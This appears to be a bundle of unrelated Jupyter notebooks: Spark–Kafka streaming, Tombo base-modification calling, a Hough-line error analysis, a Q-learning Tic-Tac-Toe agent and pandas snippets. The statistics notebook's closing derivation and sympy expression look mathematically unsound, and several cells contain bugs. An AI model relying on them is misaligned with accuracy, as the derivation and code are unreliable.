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
) ###Code
from datetime import datetime

now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Current Time =", current_time)

# these imports are required by the calls below (Spark 2.x with the
# spark-streaming-kafka-0-8 integration provides pyspark.streaming.kafka)
import pyspark
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils

sc = pyspark.SparkContext()
ssc = StreamingContext(sc, 5)

kafka_topic_name = "reco-train"
kafka_bootstrap_servers = 'localhost:9092'

# note: only the last of these three assignments takes effect; also,
# createStream expects a ZooKeeper quorum as its second argument, whereas
# createDirectStream talks to the Kafka brokers directly
kvs = KafkaUtils.createStream(ssc, kafka_bootstrap_servers, 'spark-streaming-consumer', {kafka_topic_name: 1})
kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], {"metadata.broker.list": kafka_bootstrap_servers})
kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name],
                                    {'bootstrap.servers': kafka_bootstrap_servers,
                                     'group.id': 'test-group',
                                     'auto.offset.reset': 'largest'})

lines = kvs.map(lambda x: x[1])
counts = lines.flatMap(lambda line: line.split(' '))  # overwritten by the full word-count pipeline on the next line
counts = lines.flatMap(lambda line: line.split(' ')).map(lambda word: (word, 1)).reduceByKey(lambda a, b: a+b)
counts.pprint()

ssc.start()
# stream will run for 50 sec
ssc.awaitTerminationOrTimeout(50)
ssc.stop()
sc.stop()
###Output
-------------------------------------------
Time: 2021-06-25 03:46:50
-------------------------------------------

-------------------------------------------
Time: 2021-06-25 03:46:55
-------------------------------------------

-------------------------------------------
Time: 2021-06-25 03:47:00
-------------------------------------------

-------------------------------------------
Time: 2021-06-25 03:47:05
-------------------------------------------

-------------------------------------------
Time: 2021-06-25 03:47:10
-------------------------------------------

-------------------------------------------
Time: 2021-06-25 03:47:15
-------------------------------------------

-------------------------------------------
Time: 2021-06-25 03:47:20
------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:25 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:30 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:35 ------------------------------------------- ------------------------------------------- Time: 2021-06-25 03:47:40 -------------------------------------------
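###Markdown Every batch above is empty, which usually just means nothing was written to the `reco-train` topic while the stream was running. A minimal producer sketch for feeding the topic (an illustration, not part of the original run; it assumes the `kafka-python` package is installed and a broker is listening on localhost:9092): ###Code
# hypothetical producer to exercise the word-count stream above
from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers='localhost:9092')
for msg in [b'spark streaming word count', b'kafka spark demo']:
    producer.send('reco-train', msg)  # topic name matches kafka_topic_name above
producer.flush()
producer.close()
###Output
_____no_output_____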
germinated_spores-Tombo_basepair_modification_version_1/germinated_spores_1.ipynb
###Markdown Tombo is a suite of tools primarily for the identification of modified nucleotides from nanopore sequencing data; it re-annotates the raw signal with a genomic alignment derived from existing basecalls.
* This script will identify the modified bases in the sequences

Input
* fast5 files (single-read fast5s, as pointed to below)
* reference genome.fasta

Make sure that before you run any of your samples, you define your directories ###Code
import os

FAST5IN_DIR = '../../analyses/single_fast5s/germinated_spores/rep1/'
GENOME_fn = '../../data/genomic_resources/chr_A_B_unassigned.fasta'
OUT_DIR = '../../analyses/methylation_calling/germinated_spores/'
Tombo_exc ='../../../anaconda3/bin/tombo'

## define your directories' pathways by giving them absolute paths.
FAST5IN_DIR = os.path.abspath(FAST5IN_DIR)
GENOME_fn = os.path.abspath(GENOME_fn)
OUT_DIR = os.path.abspath(OUT_DIR)
Tombo_exc = os.path.abspath(Tombo_exc)

!ls {FAST5IN_DIR}
!ls {GENOME_fn}
!{Tombo_exc} --version

### This step creates an index from raw nanopore reads and stores the raw signal alignments required to perform downstream analysis
### (the Tombo index is written alongside the fast5 directory; no separate variable is needed)
!{Tombo_exc} resquiggle {FAST5IN_DIR} {GENOME_fn} --processes 15 --num-most-common-errors 5

### this command will detect 5mC and 6mA modifications
!{Tombo_exc} detect_modifications alternative_model --fast5-basedirs {FAST5IN_DIR} \
    --statistics-file-basename germinated_spores_rep1.stats \
    --alternate-bases 5mC 6mA --processes 15

# plot raw signal at the most significant 5mC locations
# (detect_modifications above writes <basename>.5mC.tombo.stats; the original
# filename, germinated_spores.5mC.tombo.stats, did not exist, which caused the
# error shown in the output below)
!{Tombo_exc} plot most_significant --fast5-basedirs {FAST5IN_DIR} \
    --statistics-filename germinated_spores_rep1.stats.5mC.tombo.stats \
    --plot-standard-model --plot-alternate-model 5mC \
    --pdf-filename germinated_spores_rep_1_most_significant_5mC_sites.pdf
###Output
[09:55:45] Loading statistics from file.
******************** ERROR ********************
	Statistics file not provided or provided file does not exist.
******************** ERROR ********************
	Statistics file not provided or provided file does not exist.
Traceback (most recent call last):
  File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2680, in __init__
    self._parse_stats()
  File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats
    'Statistics file not provided or provided file does not exist.')
  File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit
    sys.exit()
SystemExit
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3233, in TomboStats
    stats = ModelStats(stat_fn)
  File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2684, in __init__
    'tombo/scripts/convert_stats.py if this stats file ' +
tombo.tombo_helper.TomboError: Invalid statistics file provided.
Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1 During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3141, in __init__ self._parse_stats() File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats 'Statistics file not provided or provided file does not exist.') File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit sys.exit() SystemExit During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/jamila/anaconda3/bin/tombo", line 11, in <module> sys.exit(main()) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/__main__.py", line 279, in main _plot_commands.plot_main(args) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2343, in plot_main plot_most_signif(*base_args, **kwargs) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2007, in plot_most_signif plot_intervals = ts.TomboStats(stats_fn).get_most_signif_regions( File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3235, in TomboStats stats = LevelStats(stat_fn) File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3145, in __init__ 'tombo/scripts/convert_stats.py if this stats file ' + tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1
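###Markdown The traceback above comes from pointing `plot most_significant` at a statistics file that was never written. A quick check of which statistics files `detect_modifications` actually produced (a sketch; it assumes the detection cell ran in the same working directory): ###Code
# with --statistics-file-basename germinated_spores_rep1.stats and
# --alternate-bases 5mC 6mA, Tombo writes one file per alternate base:
#   germinated_spores_rep1.stats.5mC.tombo.stats
#   germinated_spores_rep1.stats.6mA.tombo.stats
!ls germinated_spores_rep1.stats.*.tombo.stats
###Output
_____no_output_____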
examples/notebooks/Statistical_error_analysis_of_line_extraction.ipynb
###Markdown Statistical error analysis of line uncertainty
We want to find the mean and variance of the Hough-transform parameters for line extraction in 2 dimensions, as a function of the distance between the two points defining the line. This will be a good starting point for comparing the relative accuracy of lines vs points. ###Code
%matplotlib inline
# Simulations
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.stats import norm

N = 50000
img_size = 1000 # Average side length
bins = 100
L = 500 # pixels (average length)
sigma = 5./np.sqrt(12) # 5 pixel uncertainty, assumed uniform

theta = np.random.uniform(-np.pi*0.85, np.pi*0.85, N)
x1 = np.random.uniform(0, img_size, (N, 2))
dx = np.array([np.sin(-theta)*L, np.cos(-theta) * L]).transpose()
x2 = x1 + dx
ro = x1[:, 0]*np.cos(theta) + x1[:, 1] * np.sin(theta)
dtheta = np.zeros(N)
dro = np.zeros(N)
for i in range(N):
    # note: np.random.multivariate_normal expects a *covariance* matrix, so
    # sigma*np.identity(2) gives per-coordinate variance sigma (not sigma**2)
    x1_measured = np.random.multivariate_normal(x1[i], sigma*np.identity(2))
    x2_measured = np.random.multivariate_normal(x2[i], sigma*np.identity(2))
    dx_measured = x2_measured-x1_measured
    theta_measured = np.arctan2(-dx_measured[0], dx_measured[1])
    ro_measured = x1_measured[0]*np.cos(theta_measured) + x1_measured[1] * np.sin(theta_measured)
    ro_measured_2 = x2_measured[0]*np.cos(theta_measured) + x2_measured[1] * np.sin(theta_measured)  # computed but unused below
    dtheta[i] = theta[i]-theta_measured
    dro[i] = ro[i] - ro_measured

ans = np.histogram(dtheta, bins, density = True)
y_theta = ans[0]
x_theta = ans[1][:-1]
sig_theta = np.std(dtheta)
print(sig_theta)
plt.plot(x_theta,y_theta, "-b", x_theta, norm.pdf(x_theta, 0, sig_theta), "-r")
plt.xlabel("$\\Delta \\theta$")
plt.ylabel("$p(\\Delta \\theta)$")
plt.legend(["Simulation", "Approximation"])
ans = np.histogram(dro/sigma, bins, range= (-5, 5), density = True)
y_ro = ans[0]
x_ro = ans[1][:-1]
sig_ro = np.std(dro/sigma)
print(sig_ro)
def double_exp_pdf(x, var):
    b = np.sqrt(var/2)
    return 1/(2*b)*np.exp(-np.abs(x)/b)
plt.plot(x_ro, y_ro, "-b", x_ro, double_exp_pdf(x_ro, sig_ro**2), "-r")
plt.xlabel("$\\frac{\\Delta r}{\\sigma}$")
plt.ylabel("$p(\\Delta r)$")
plt.legend(["Simulation", "Approximation"])
###Output
1.6622574229981983
###Markdown We want to find the distribution of $\hat{\theta}$ (cf. https://stats.stackexchange.com/questions/3215/trigonometric-operations-on-standard-deviations):
$$ \hat{\theta} = \tan^{-1}(\Delta Y/\Delta X) $$
$$ \theta = \theta_0 + \Delta \theta $$
$$ \Delta Y = \sigma_y \zeta + \mu_y $$
$$ \Delta X = \sigma_x \xi + \mu_x $$
where $\zeta, \xi$ are standard normal random variables. For simplicity we will assume that $\sigma_y = \sigma_x = \sigma$, $\mu_y = \sin(\theta_0) L$, and $\mu_x = \cos(\theta_0) L$, where $L$ is the distance between the two points.
$$ P[\hat{\theta} \le \theta] = P[\tan^{-1}(\Delta Y/\Delta X) \le \theta_0 + \Delta \theta] = P[\Delta Y/\Delta X \le \tan(\Delta \theta + \theta_0)] $$
Let $q = \tan(\theta) = \tan(\Delta \theta + \theta_0)$. Then
$$ = P[\sigma \zeta + \mu_y \le q (\sigma \xi + \mu_x)] $$
$$ = P\left[\frac{\sigma}{L} (\zeta - q \xi) \le q \cos(\theta_0) - \sin(\theta_0)\right] $$
The left-hand side is a difference of Gaussians, which is itself Gaussian, so this is the probability that a zero-mean Gaussian variable falls below a function of $\theta$ and $\theta_0$. Let $b(\theta) = q \cos(\theta_0) - \sin(\theta_0)$ and let $\sigma^*(\theta) = (\frac{\sigma}{L})^2(1 + \tan(\theta)^2)$ denote the variance of the left-hand side.
The expression then becomes: $$ P[\hat{\theta} \le \theta] = \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz $$ We have that $$ p(\theta) = \frac{d(P[\hat{\theta} \le \theta])}{d\theta} = \mathcal{N}\left(b(\theta); 0, \sigma^*(\theta) \right) \cdot \frac{db(\theta)}{d\theta} + \int_{-\infty}^{b(\theta)} \frac{d\left(\mathcal{N}\left(z; 0, \sigma^*(\theta) \right)\right)}{d\theta} dz$$ This simplifies to: $$ p(\theta) =\mathcal{N}\left(b(\theta); 0,\sigma^*(\theta) \right) \cdot \left(\frac{db(\theta)}{d\theta} + \frac{d((\sigma^*(\theta))^{-2})}{d\theta}\right) + \frac{1}{\sigma^*(\theta)}\frac{d\sigma^*(\theta) }{d\theta} \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz$$ ###Code import sympy as sp from sympy import symbols, exp, init_printing, latex, tan, atan, cos, sin init_printing() sig, theta, theta0, L = symbols("sigma theta theta_0 L") mux = L * cos(theta0) muy = L * sin(theta0) Z = (muy * (sig + 1) - mux * (sig + 1) * tan(theta - theta0))**2 / (2 * (sig**2 + sig**2 + tan(theta - theta0)**2)) expr = Z.diff(theta).diff(theta).subs(theta, 0) expr.subs(theta0, 0) ###Output _____no_output_____
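###Markdown A quick numeric sanity check (a minimal sketch, reusing the numpy import from the simulation above): since $q = \tan(\theta)$, we have $b(\theta_0) = \tan(\theta_0)\cos(\theta_0) - \sin(\theta_0) = 0$, i.e. the distribution of $\hat{\theta}$ is centred on the true angle. ###Code
# evaluate b(theta) around theta_0; the middle entry (theta == theta_0) should be ~0
theta0_check = 0.3
thetas = np.linspace(theta0_check - 0.1, theta0_check + 0.1, 5)
b = np.tan(thetas) * np.cos(theta0_check) - np.sin(theta0_check)
print(b)
###Output
_____no_output_____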
TicTacToe/TicTacToe_Agent.ipynb
###Markdown Tic-Tac-Toe Agent
In this notebook, you will learn to build an RL agent (using Q-learning) that learns to play Numerical Tic-Tac-Toe with odd numbers. The environment plays randomly against the agent, i.e. its strategy is to put an even number in a randomly chosen empty cell. The following is the layout of the notebook:
 - Defining the epsilon-greedy strategy
 - Tracking state-action pairs for convergence
 - Defining hyperparameters for the Q-learning algorithm
 - Generating episodes and applying the Q-update equation
 - Checking convergence of the Q-values
Importing libraries
Write the code to import the Tic-Tac-Toe class from the environment file ###Code
# from <TC_Env> import <TicTacToe> - import your class from environment file
import collections
import numpy as np
import random
import pickle
import time
from matplotlib import pyplot as plt

from TCGame_Env import TicTacToe
from tqdm import tqdm

# Function to convert state array into a string to store it as keys in the dictionary
# states in Q-dictionary will be of form: x-4-5-3-8-x-x-x-x
#   x | 4 | 5
#   ----------
#   3 | 8 | x
#   ----------
#   x | x | x
def Q_state(state):
    return ('-'.join(str(e) for e in state.flatten().astype(int))).replace('0', 'x')

# Defining a function which will return the valid (all possible) actions corresponding to a state.
# Important to avoid errors during deployment.
def valid_actions(state):
    valid_Actions = []
    valid_Actions = [i for i in env.action_space(state)[0]]  ###### ------- please name your environment `env`
    return valid_Actions

# Defining a function which will add new Q-values to the Q-dictionary.
def add_to_dict(state):
    state1 = Q_state(state)
    valid_act = valid_actions(state)
    if state1 not in Q_dict.keys():
        for action in valid_act:
            Q_dict[state1][action] = 0
###Output
_____no_output_____
###Markdown Epsilon-greedy strategy - Write your code here (you can build your epsilon-decay function similar to the one given at the end of the notebook) ###Code
# Defining epsilon-greedy policy.
def epsilon_greedy_strategy(state, time):
    epsilon = min_epsilon + np.exp(-0.000001 * time) * (max_epsilon - min_epsilon)
    rand = np.random.random()
    if rand > epsilon:
        greedy_action = max(Q_dict[Q_state(state)], key=Q_dict[Q_state(state)].get)
    else:
        greedy_action = random.sample(valid_actions(state), 1)[0]
    return greedy_action
###Output
_____no_output_____
###Markdown Tracking the state-action pairs for checking convergence - write your code here ###Code
# Initialise Q_dictionary as 'Q_dict' and States_tracked as 'States_track' (for convergence)
Q_dict = collections.defaultdict(dict)
States_track = collections.defaultdict(dict)

# Initialise a few random states to be tracked
def initialise_tracking_states():
    sample_action_values = [('1-x-x-x-x-4-x-x-x', (7, 5)),
                            ('x-2-x-x-x-x-5-x-x', (5, 7)),
                            ('x-8-x-7-x-x-x-x-x', (8, 1)),
                            ('x-x-x-1-6-x-x-x-x', (5, 3)),
                            ('7-4-x-x-x-6-3-x-x', (3, 5)),
                            ('x-9-5-x-x-x-8-4-x', (0, 3)),
                            ('2-7-x-x-6-x-x-3-x', (8, 7)),
                            ('x-8-x-x-x-x-x-9-x', (8, 1)),
                            ('x-6-x-x-x-x-x-x-1', (0, 9)),
                            ('1-2-x-x-x-6-7-x-x', (4, 9)),
                            ('5-7-x-x-x-x-2-6-x', (2, 3)),  # lowercase 'x' throughout: a capital 'X' could never match a Q_state key
                            ('7-x-6-x-x-4-9-x-x', (8, 5)),
                            ('x-8-5-x-4-x-x-1-x', (6, 9)),
                            ('9-x-3-x-4-x-x-x-8', (1, 1))]
    for q_value in sample_action_values:
        state = q_value[0]
        action = q_value[1]
        States_track[state][action] = []

def preview_game(current_status):
    val = current_status.split('-')
    print("\n "+str(val[0])+" | "+str(val[1])+" | "+str(val[2])+" ")
    print('-----------')
    print(" "+str(val[3])+" | "+str(val[4])+" | "+str(val[5])+" ")
    print('-----------')
    print(" "+str(val[6])+" | "+str(val[7])+" | "+str(val[8])+" \n")

preview_game('9-x-3-x-4-x-x-x-8')

# Defining a function to save the Q-dictionary as a pickle file
def save_obj(obj, name):
    with open(name + '.pkl', 'wb') as f:
        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)

def save_tracking_states():
    for state in States_track.keys():
        for action in States_track[state].keys():
            if state in Q_dict and action in Q_dict[state]:
                States_track[state][action].append(Q_dict[state][action])

initialise_tracking_states()
States_track
###Output
_____no_output_____
###Markdown Define hyperparameters ---write your code here ###Code
# total no. of episodes
EPISODES = 5000000
# learning rate
LR = 0.20
# discount factor
GAMMA = 0.8
# no. of episodes after which states_tracked will be saved
threshold = 2500
# no. of episodes after which to preview the status of games played
checkpoint_print_episodes = 500000
# Min greed: 0.1%
min_epsilon = 0.001
# Greed: 100%
max_epsilon = 1.0
###Output
_____no_output_____
###Markdown Q-update loop ---write your code here ###Code
start_time = time.time()

q_track={}
q_track['1-x-x-x-x-4-x-x-x']=[]
q_track['x-2-x-x-x-x-5-x-x']=[]
q_track['x-8-x-7-x-x-x-x-x']=[]
q_track['x-x-x-1-6-x-x-x-x']=[]
q_track['7-4-x-x-x-6-3-x-x']=[]
q_track['x-9-5-x-x-x-8-4-x']=[]
q_track['2-7-x-x-6-x-x-3-x']=[]
q_track['x-8-x-x-x-x-x-9-x']=[]
q_track['x-6-x-x-x-x-x-x-1']=[]
q_track['1-2-x-x-x-6-7-x-x']=[]
q_track['5-7-x-x-x-x-2-6-x']=[]  # lowercase 'x' to match the Q_state encoding
q_track['7-x-6-x-x-4-9-x-x']=[]
q_track['x-8-5-x-4-x-x-1-x']=[]
q_track['9-x-3-x-4-x-x-x-8']=[]

agent_won_count = 0
env_won_count = 0
tie_count = 0

for episode in tqdm(range(EPISODES)):
    ##### Start writing your code from the next line
    env = TicTacToe()
    current_state = env.state

    ## Initialising parameters for the episode
    reward=0
    total_reward = 0
    is_terminal = False

    # adding the current state to dictionary
    add_to_dict(current_state)

    while not is_terminal:
        current_lookup = Q_state(current_state)
        # applying the epsilon-greedy policy
        current_action = epsilon_greedy_strategy(current_state, episode)

        if Q_state(current_state) in q_track.keys():
            q_track[Q_state(current_state)].append(current_action)

        next_state,reward,is_terminal, msg = env.step(current_state,current_action)
        next_lookup = Q_state(next_state)

        if is_terminal:
            q_value_max = 0
            # Tracking the count of games won by agent and environment
            if msg == "Agent Won!":
                agent_won_count += 1
            elif msg == "Environment Won!":
                env_won_count += 1
            else:
                tie_count += 1
        else:
            add_to_dict(next_state)
            max_next = max(Q_dict[next_lookup],key=Q_dict[next_lookup].get)
            q_value_max = Q_dict[next_lookup][max_next]

        Q_dict[current_lookup][current_action] += LR * ((reward + (GAMMA * (q_value_max))) - Q_dict[current_lookup][current_action])
        current_state = next_state
        total_reward += reward

    if (episode + 1) % checkpoint_print_episodes == 0:
        print("After playing %d games, Agent Won : %.4f, Environment Won : %.4f, Tie : %.4f"% (episode + 1,
            agent_won_count / (episode + 1), env_won_count /(episode + 1), tie_count / (episode + 1)))

    if ((episode + 1) % threshold) == 0:
        save_tracking_states()

    if ((episode + 1) % 1000000) == 0:
        print('Processed %dM episodes'%((episode+1)/1000000))

elapsed_time = time.time() - start_time
save_obj(States_track,'States_tracked')
save_obj(Q_dict,'Policy')
print('Total Execution time: ', elapsed_time)
###Output
10%|█         | 500208/5000000 [06:31<57:39, 1300.63it/s]
###Markdown Check the Q-dictionary ###Code
len(Q_dict)
# try checking, for one of the states, which action your agent thinks is best ----- This will not be evaluated
Q_dict['x-2-x-x-x-x-5-x-x']
###Output
_____no_output_____
###Markdown Check the states tracked for Q-values convergence (non-evaluative) ###Code
# Write the code for plotting the graphs for state-action pairs tracked
plt.figure(0, figsize=(16,7))
plt.subplot(241)
t1=States_track['x-2-x-x-x-x-5-x-x'][(5,7)]
plt.title("(s,a)='x-2-x-x-x-x-5-x-x',(5,7)")
plt.plot(np.asarray(range(0, len(t1))),np.asarray(t1))
plt.subplot(242)
t2=States_track['1-x-x-x-x-4-x-x-x'][(7,5)]
plt.title("(s,a)='1-x-x-x-x-4-x-x-x',(7,5)")
plt.plot(np.asarray(range(0, len(t2))),np.asarray(t2))
plt.subplot(243)
t3=States_track['9-x-3-x-4-x-x-x-8'][(1,1)]
plt.title("(s,a)='9-x-3-x-4-x-x-x-8',(1,1)")
plt.plot(np.asarray(range(0, len(t3))),np.asarray(t3))
plt.subplot(244)
t4=States_track['x-8-5-x-4-x-x-1-x'][(6,9)]
plt.title("(s,a)='x-8-5-x-4-x-x-1-x',(6,9)")
plt.plot(np.asarray(range(0, len(t4))),np.asarray(t4))

plt.show()
###Output
_____no_output_____
###Markdown Epsilon-decay check ###Code
max_epsilon = 1.0
min_epsilon = 0.001
# use a dedicated name for the x-axis so we don't shadow the `time` module imported above
episodes = np.arange(0,5000000)
epsilon = []
for i in range(0,5000000):
    epsilon.append(min_epsilon + (max_epsilon - min_epsilon) * np.exp(-0.000001*i))
plt.plot(episodes, epsilon)
plt.show()
###Output
_____no_output_____
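###Markdown A short usage sketch (an illustration; it assumes `Policy.pkl` was written by `save_obj` in the training loop above): the greedy action for any visited state can be read back from the pickled Q-dictionary. ###Code
import pickle

with open('Policy.pkl', 'rb') as f:
    Q = pickle.load(f)

state = '1-x-x-x-x-4-x-x-x'  # a state string in the Q_state encoding
if state in Q:
    best_action = max(Q[state], key=Q[state].get)  # (cell, number) pair with the highest Q-value
    print(state, '->', best_action)
###Output
_____no_output_____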
docs/_sources/python/pandas.ipynb
###Markdown Pandas: count unique words in a column ###Code
results = set()
df['text'].str.lower().str.split().apply(results.update)
n_words = len(results)
n_words
###Output
_____no_output_____
###Markdown Random sample for each class ###Code
def random_balance_subset(df, n=2000):
    """Select a random sample of n rows for each class.

    Args:
        df (pd.DataFrame): frame with a 'y' label column, e.g. values in [0, 1]
        n (int): number of rows to sample per class
    """
    list_of_dataframes = []
    ys = list(df['y'].unique())
    for y in ys:
